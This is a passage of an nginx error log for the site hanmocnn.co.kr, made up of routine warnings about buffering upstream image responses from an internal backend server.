/var/cache/nginx/proxy_temp/1/98/0000015981 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000015982 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000015983 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000015984 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000015985 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000015986 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000015987 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:13:29 [warn] 940#940: *93161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000015988 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/98/0000015989 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000015990 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000015991 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:18:50 [warn] 941#941: *93176 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/99/0000015992 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:26:24 [warn] 942#942: *93219 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/99/0000015993 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:26:24 [warn] 942#942: *93219 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/99/0000015994 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/99/0000015995 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/99/0000015996 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:31:03 [warn] 942#942: *93243 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/99/0000015997 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:38:38 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/99/0000015998 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:38:38 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000015999 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:38:56 [warn] 942#942: *93259 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/00/0000016000 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:43:22 [warn] 942#942: *93319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000016001 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000016002 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000016003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:48:24 [warn] 942#942: *93334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000016004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000016005 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000016006 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000016007 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000016008 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000016009 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000016010 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000016011 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000016012 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/01/0000016013 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/01/0000016014 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/01/0000016015 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:14:03 [warn] 939#939: *93430 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000016016 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:14:03 [warn] 939#939: *93430 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000016017 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000016018 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/01/0000016019 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000016020 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/02/0000016021 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/02/0000016022 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/02/0000016023 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/02/0000016024 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/02/0000016025 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/02/0000016026 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/02/0000016027 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/02/0000016028 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/02/0000016029 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/03/0000016030 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 03:38:50 [warn] 941#941: *93665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/03/0000016032 while reading upstream, client: 149.57.180.66, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 03:38:50 [warn] 941#941: *93665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/03/0000016033 while reading upstream, client: 149.57.180.66, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:10 [warn] 952#952: *96830 using uninitialized "server" variable while logging request, client: 51.159.107.135, server: hanmocnn.co.kr, request: "HEAD / HTTP/1.1", host: "www.hanmocnn.co.kr:443" -2026/02/18 07:03:13 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/52/0000017521 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:13 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/52/0000017522 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/52/0000017523 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/52/0000017524 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/52/0000017525 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/52/0000017526 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/52/0000017527 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/52/0000017528 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 07:03:19 [warn] 952#952: *96846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/52/0000017529 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr" -2026/02/18 11:02:30 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/53/0000017530 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:03:58 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/53/0000017531 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:03:58 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/53/0000017532 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/53/0000017533 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/53/0000017534 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/53/0000017535 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/27/0000018279 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/28/0000018280 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/28/0000018281 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/28/0000018282 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000018283 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET 